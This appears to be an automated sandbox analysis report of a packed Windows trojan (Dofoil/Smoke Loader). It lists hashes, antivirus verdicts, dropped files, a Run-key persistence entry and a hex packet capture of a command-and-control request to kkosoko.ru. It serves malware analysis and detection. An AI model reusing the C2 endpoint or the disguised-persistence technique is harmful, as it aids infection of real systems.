Analysis Date2018-02-04 08:59:54
MD5c90c87b6c15550dd3f3a35d65c74663e
SHA1e1727a187d4f9562e9e63e17bdef79b5893c1228

Static Details:

File typePE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
PEhash
AVArcabit (arcavir)Gen:Variant.Sirefef.16
AVAuthentiumW32/Trojan.MBDZ-7846
AVGrisoft (avg)Win32/DH{Ow?}
AVAvira (antivir)TR/Crypt.ULPM.Gen
AVAlwil (avast)Trojan-gen
AVAlwil (avast)Win32:Trojan-gen
AVAd-AwareGen:Variant.Sirefef.16
AVBitDefenderGen:Variant.Sirefef.16
AVBullGuardError Scanning File
AVClamAVError Scanning File
AVDr. WebTrojan.DownLoader5.11806
AVEmsisoftGen:Variant.Sirefef.16
AVMicroWorld (escan)Gen:Variant.Sirefef.16
AVCA (E-Trust Ino)Error Scanning File
AVFortinetW32/Yakes.B!tr
AVFrisk (f-prot)No Virus
AVF-SecureGen:Variant.Sirefef.16
AVIkarusError Scanning File
AVK7Trojan ( 00315e551 )
AVKasperskyError Scanning File
AVMalwareBytesNo Virus
AVMcafeeNo Virus
AVMicrosoft Security EssentialsDDoS:Win32/Dofoil.A
AVNANONo Virus
AVEset (nod32)Win32/Kryptik.VJC
AVPadvishNo Virus
AVCAT (quickheal)No Virus
AVRisingNo Virus
AV360 SafeNo Virus
AVSUPERAntiSpywareNo Virus
AVSymantecPacked.Generic.349
AVTrend MicroNo Virus
AVTwisterTrojan.87AAAA9200FFFF#72.mg
AVVirusBlokAda (vba32)BScope.Trojan.Yakes.1521
AVWindows DefenderDDoS:Win32/Dofoil.A
AVZillya!Error Scanning File

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\THX1138\AppData\Local\Temp\e1727a187d4f9562e9e63e17bdef79b5893c1228.exe

Process
↳ C:\Windows\SysWOW64\svchost.exe

Creates Mutex
Creates MutexSmokeDDoS
Creates FileC:\Users\THX1138\AppData\Roaming\user32.dat
Creates FileC:\Users\THX1138\AppData\Roaming\smss.exe
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Policies ➝
C:\Users\THX1138\AppData\Roaming\smss.exe

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   47455420 2f737461 72742f69 6e646578   GET /start/index
0x00000010 (00016)   2e706870 3f636d64 3d676574 7461736b   .php?cmd=gettask
0x00000020 (00032)   266c6f67 696e3d30 45454443 37384644   &login=0EEDC78FD
0x00000030 (00048)   41304545 36333839 2677696e 3d362e31   A0EE6389&win=6.1
0x00000040 (00064)   26766572 3d313032 26626974 733d3120   &ver=102&bits=1 
0x00000050 (00080)   48545450 2f312e30 0d0a5573 65722d41   HTTP/1.0..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   300d0a48 6f73743a 206b6b6f 736f6b6f   0..Host: kkosoko
0x00000080 (00128)   6b6f2e72 750d0a43 6f6e6e65 6374696f   ko.ru..Connectio
0x00000090 (00144)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a656e74 3a204d6f 7a696c6c 612f342e   .ent: Mozilla/4.
0x00000070 (00112)   300d0a48 6f73743a 206b6b6f 736f6b6f   0..Host: kkosoko
0x00000080 (00128)   6b6f2e72 750d0a43 6f6e6e65 6374696f   ko.ru..Connectio
0x00000090 (00144)   6e3a2063 6c6f7365 0d0a0d0a            n: close....


Strings